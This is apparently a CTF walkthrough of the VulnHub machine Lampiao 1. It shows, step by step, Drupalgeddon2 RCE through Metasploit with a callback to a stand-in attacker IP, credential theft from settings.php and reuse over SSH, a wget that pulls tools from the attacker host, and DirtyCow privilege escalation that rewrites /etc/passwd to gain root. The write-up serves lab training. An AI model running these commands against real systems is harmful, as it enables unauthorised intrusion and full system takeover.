.jpf Lampiao 1 CTF Writeup — Drupalgeddon2 + DirtyCow | Th0mas_sh316y
CTF WRITEUP VULNHUB LINUX MEDIUM

Lampiao 1 — Drupalgeddon2 & DirtyCow

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

CVEs

CVE-2018-7600 · CVE-2016-5195

Lampiao 1 Machine
Machine: Lampiao 1 · Medium · Linux · VulnHub

Lampiao 1 is a Medium-difficulty VulnHub machine with a Brazilian-outlaw theme. The target runs Drupal on a non-standard port, making thorough port scanning a mandatory first step. Exploitation begins with Drupalgeddon2 (CVE-2018-7600) for unauthenticated remote code execution, continues with credential extraction from Drupal's configuration file, and escalates to root using the DirtyCow kernel vulnerability (CVE-2016-5195) — one of the most widely known Linux kernel exploits ever published.

01_Reconnaissance

The initial scan targets three specific ports: 22 (SSH), 80 (HTTP), and 1898 (non-standard HTTP). Version detection and default script execution are included. Port 1898 is the critical finding — it hosts a Drupal CMS installation that is not immediately obvious from a default-port scan alone.

terminal / nmap 
$ sudo nmap -p22,80,1898 <TARGET_IP> -sV -sC -A

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1
80/tcp   open  http    Apache httpd 2.4.7
1898/tcp open  http    Apache httpd 2.4.7 (Drupal CMS)

Recon Tip — Non-Standard Ports

Always run a full port scan (nmap -p-) or at minimum target common alternative HTTP ports (8080, 8443, 1898, 10000, etc.) before assuming a host has limited exposure. Critical services are often hidden on non-standard ports intentionally.

Navigating to http://<TARGET_IP>:1898 confirms a running Drupal installation. The CHANGELOG.txt file at the root of the Drupal directory is accessible and reveals the exact version number — confirming vulnerability to CVE-2018-7600 (Drupalgeddon2).

02_Exploitation — Drupalgeddon2 (CVE-2018-7600)

Drupalgeddon2 is an unauthenticated remote code execution vulnerability in Drupal's Form API. The flaw exists because Drupal does not properly sanitize the #access_callback property before processing form submissions, allowing an attacker to execute arbitrary PHP code without any authentication. Metasploit ships a reliable module for this.

terminal / metasploit 
$ msfconsole -q
msf6 > search drupal

   Name                                     Rank
   ----                                     ----
   exploit/unix/webapp/drupal_drupalgeddon2  excellent

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(...) > set RHOSTS <TARGET_IP>
msf6 exploit(...) > set RPORT 1898
msf6 exploit(...) > set LHOST <ATTACKER_IP>
msf6 exploit(...) > run

[*] Meterpreter session 1 opened — www-data shell established

The exploit delivers a Meterpreter session as www-data. Dropping into a system shell gives us command execution on the target. The web server user has read access to all Drupal configuration files — which is where the credential chain begins.

03_Credential_Extraction — settings.php

Drupal stores its database configuration in sites/default/settings.php. This file contains the database username and password in plaintext. On poorly administered machines, developers reuse these credentials as system-account passwords — a misconfiguration that frequently enables lateral movement.

terminal / settings.php 
$ cat /var/www/html/sites/default/settings.php

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'tiago',
      'password' => '[REDACTED]',
      'host'     => 'localhost',
    ),
  ),
);

Key Finding — Credential Reuse

The database password for user tiago has been reused as the SSH login credential. This is a textbook credential reuse vulnerability. In real engagements, always test every recovered credential against every available service — SSH, FTP, RDP, web panels, and database interfaces.

04_Lateral_Movement — SSH as tiago

The credential recovered from settings.php is tested against the SSH service on port 22. The login succeeds, giving us a proper interactive TTY as tiago. This is significantly more stable than the Meterpreter session and provides a cleaner environment for post-exploitation.

terminal / ssh 
$ ssh tiago@<TARGET_IP>
Password: [REDACTED]

tiago@lampiao:~$ id
uid=1000(tiago) gid=1000(tiago) groups=1000(tiago)

tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP

The kernel version revealed by uname -a is immediately noteworthy — Linux kernel 4.4.0-31 is within the vulnerable range for DirtyCow. To confirm this without guessing, the Linux Exploit Suggester script is used.

05_Kernel_Enumeration — Linux Exploit Suggester

The Linux Exploit Suggester script automates kernel version analysis and cross-references it against a database of known exploits. It is one of the fastest ways to identify applicable privilege escalation vectors on a Linux host.

terminal / exploit suggester 
# On attacker machine — host the script
$ python3 -m http.server 80

# On target machine — download and run
tiago@lampiao:~$ wget http://<ATTACKER_IP>/linux-exploit-suggester.sh
tiago@lampiao:~$ chmod +x linux-exploit-suggester.sh
tiago@lampiao:~$ ./linux-exploit-suggester.sh

[+] [CVE-2016-5195] dirtycow 2
    Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    Exposure: highly probable
    Tags: ubuntu=14.04|16.04 (kernel:4.4.0-*)
    Download URL: https://www.exploit-db.com/download/40847

CVE-2016-5195 — DirtyCow Explained

DirtyCow is a race condition in the Linux kernel's memory subsystem. The kernel's copy-on-write (COW) mechanism can be abused to gain write access to read-only memory mappings, allowing a low-privileged user to overwrite privileged files — most commonly used to modify /etc/passwd and insert a new root user. The vulnerability affects Linux kernels from version 2.6.22 up to 4.8.3.

06_PrivEsc — DirtyCow (CVE-2016-5195)

The DirtyCow variant from Exploit-DB (40847) creates a new root-level user by modifying /etc/passwd via the race condition. The exploit requires a C++ compiler with thread support. The resulting binary is run directly on the target, after which the new root password is used to switch accounts.

terminal / dirtycow compilation & execution 
# Download the exploit source to the target
tiago@lampiao:~$ wget https://www.exploit-db.com/download/40847 -O 40847.cpp

# Compile with g++ (C++11, threaded)
tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow2 40847.cpp -lutil

# Execute the exploit
tiago@lampiao:~$ ./dirtycow2

/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: [REDACTED]
Complete line:
firefart:[REDACTED HASH]:0:0:pwned:/root:/bin/bash

mmap: 7f...
madvise 0
procselfmem 73626

Done! Check /etc/passwd to see if the new user was created.

# Switch to the newly created root account
tiago@lampiao:~$ su root
Password: [REDACTED]

root@lampiao:~# whoami
root

root@lampiao:~# cat /root/flag.txt

Post-Exploitation Note — Cleanup

DirtyCow directly modifies /etc/passwd on disk. In a real engagement, always restore the original file from the backup created at /tmp/passwd.bak before ending the assessment. Leaving a modified /etc/passwd on a production system constitutes unauthorized persistent access.

07_Attack_Chain_Summary

  1. 01 Nmap scan → ports 22 (SSH), 80 (HTTP), 1898 (Drupal)
  2. 02 Port 1898 → Drupal CMS → CHANGELOG.txt confirms vulnerable version
  3. 03 Metasploit drupal_drupalgeddon2 (CVE-2018-7600) → Meterpreter as www-data
  4. 04 /var/www/html/sites/default/settings.php → tiago's credentials extracted
  5. 05 SSH as tiago → credential reuse confirmed → stable shell
  6. 06 linux-exploit-suggester.sh → CVE-2016-5195 (DirtyCow) — highly probable
  7. 07 Exploit-DB 40847 → g++ compile → ./dirtycow2 → /etc/passwd modified
  8. 08 su root → password [REDACTED] → ROOT achieved